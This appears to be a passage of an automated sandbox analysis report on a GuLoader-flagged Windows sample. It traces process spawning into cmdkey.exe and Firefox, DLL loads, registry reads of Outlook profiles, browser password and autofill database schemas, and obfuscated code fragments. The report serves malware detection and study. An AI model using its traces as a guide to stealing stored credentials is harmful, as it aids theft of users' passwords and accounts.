        Source: cmdkey.exe, 00000005.00000003.17387345441.0000000003146000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21523901420.0000000003167000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17387654304.0000000003167000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: cmdkey.exe, 00000005.00000003.17395387986.00000000080F7000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21528309746.0000000008102000.00000004.00000020.00020000.00000000.sdmp, 45-0FIUV.5.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
        Source: ImBm40hNZ2.exeReversingLabs: Detection: 39%
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile read: C:\Users\user\Desktop\ImBm40hNZ2.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\ImBm40hNZ2.exe "C:\Users\user\Desktop\ImBm40hNZ2.exe"
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess created: C:\Users\user\Desktop\ImBm40hNZ2.exe "C:\Users\user\Desktop\ImBm40hNZ2.exe"
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess created: C:\Users\user\Desktop\ImBm40hNZ2.exe "C:\Users\user\Desktop\ImBm40hNZ2.exe"Jump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: sorteringsordenens.lnk.0.drLNK file: ..\Users\Public\Music\chieftainship.bar
        Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: ImBm40hNZ2.exeStatic file information: File size 1094223 > 1048576
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aypAdCUEzlG.exe, 00000004.00000000.17122430937.000000000032E000.00000002.00000001.01000000.00000008.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21523593349.000000000032E000.00000002.00000001.01000000.00000008.sdmp
        Source: Binary string: cmdkey.pdbGCTL source: ImBm40hNZ2.exe, 00000003.00000003.17165888729.0000000003225000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000003.20397219857.000000000160B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: ImBm40hNZ2.exe, 00000003.00000003.17108712152.000000003357E000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.17112324273.000000003372A000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17211499240.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17208213325.0000000003521000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: ImBm40hNZ2.exe, ImBm40hNZ2.exe, 00000003.00000003.17108712152.000000003357E000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.17112324273.000000003372A000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17211499240.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17208213325.0000000003521000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: cmdkey.pdb source: ImBm40hNZ2.exe, 00000003.00000003.17165888729.0000000003225000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000003.20397219857.000000000160B000.00000004.00000001.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000000.00000002.16987895895.00000000034AB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00405EBC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EBC
        Source: System.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x46d2
        Source: ImBm40hNZ2.exeStatic PE information: real checksum: 0x10df67 should be: 0x11a2e4
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_10002D40 push eax; ret 0_2_10002D6E
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338D21AD pushad ; retf 0004h3_2_338D223F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338D97A1 push es; iretd 3_2_338D97A8
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339008CD push ecx; mov dword ptr [esp], ecx3_2_339008D6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038821AD pushad ; retf 0004h5_2_0388223F
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038897A1 push es; iretd 5_2_038897A8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038B08CD push ecx; mov dword ptr [esp], ecx5_2_038B08D6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0301F140 push edi; iretd 5_2_0301F148
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_030051EA push FFFFFF9Ch; ret 5_2_030051EC
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_030117A7 push eax; ret 5_2_030117C2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0301B60B push ss; ret 5_2_0301B60C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0301754C push 0000002Dh; ret 5_2_0301755E
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03012581 push edx; retf 5_2_0301258A
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03001AEA push ecx; ret 5_2_03001AEB
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03020843 push esp; iretd 5_2_0302086F
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03003F40 push ebp; iretd 5_2_03004003
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03019E4A push esi; ret 5_2_03019E5B
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03019E50 push esi; ret 5_2_03019E5B
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03686245 push ecx; iretd 5_2_0368627D
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368F10A push 096B400Eh; ret 5_2_0368F117
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_036861F9 push ecx; iretd 5_2_0368627D
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368562C push ss; retf 5_2_03685636
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03687585 push sp; ret 5_2_03687589
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03686438 push ebp; retf 5_2_0368643B
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368F4A3 push D8275BBDh; retf 5_2_0368F4A8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03685BE8 push ss; iretd 5_2_03685CB1
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03686AE9 pushad ; retf 5_2_03686B10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368CE73 push ebp; iretd 5_2_0368CE78
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368CD75 push FFFFFFA0h; retf 5_2_0368CDEA
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368CDF8 push ebp; iretd 5_2_0368CE78
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03685C32 push ss; iretd 5_2_03685CB1
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile created: C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
